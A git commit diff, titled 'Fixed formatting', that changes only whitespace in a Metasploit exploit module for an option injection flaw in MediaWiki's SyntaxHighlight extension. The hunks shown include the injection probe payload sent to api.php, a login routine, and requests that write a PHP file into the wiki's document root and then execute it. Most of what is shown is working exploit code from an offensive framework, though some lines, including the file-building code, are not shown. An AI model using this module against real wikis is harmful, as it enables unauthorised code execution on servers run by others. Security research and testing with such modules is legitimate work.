Fixed formatting
parent
1569d2cf8e
commit
f9e7715adb
|
@ -11,7 +11,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
super(update_info(info,
|
||||
'Name' => 'MediaWiki SyntaxHighlight extension option injection vulnerability',
|
||||
'Description' => %q{
|
||||
This module exploits an option injection vulnerability in the SyntaxHighlight
|
||||
This module exploits an option injection vulnerability in the SyntaxHighlight
|
||||
extension of MediaWiki. It tries to create & execute a PHP file in the document root.
|
||||
The USERNAME & PASSWORD options are only needed if the Wiki is configured as private.
|
||||
},
|
||||
|
@ -43,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
OptBool.new('CLEANUP', [ false, "Delete created PHP file?", true ])
|
||||
])
|
||||
end
|
||||
|
||||
|
||||
def check
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
|
@ -56,7 +56,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'text' => '<syntaxhighlight lang="java" start="0,full=1"></syntaxhighlight>'
|
||||
}
|
||||
})
|
||||
|
||||
|
||||
if(res && res.headers.key?('MediaWiki-API-Error'))
|
||||
if(res.headers['MediaWiki-API-Error'] == 'internal_api_error_MWException')
|
||||
return Exploit::CheckCode::Appears
|
||||
|
@ -68,7 +68,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
|
||||
# use deprecated interface
|
||||
def login
|
||||
print_status("Trying to login....")
|
||||
|
@ -124,7 +124,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
if datastore['USERNAME'] && datastore['USERNAME'].length > 0
|
||||
login
|
||||
end
|
||||
|
||||
|
||||
check_code = check
|
||||
unless check_code == Exploit::CheckCode::Detected || check_code == Exploit::CheckCode::Appears
|
||||
fail_with(Failure::NoTarget, "#{peer}")
|
||||
|
@ -137,7 +137,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
cleanup = ""
|
||||
end
|
||||
print_status("Local PHP file: #{cssfile}")
|
||||
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, 'api.php'),
|
||||
|
@ -154,4 +154,4 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
send_request_cgi({'uri' => normalize_uri(target_uri.path, cssfile)})
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|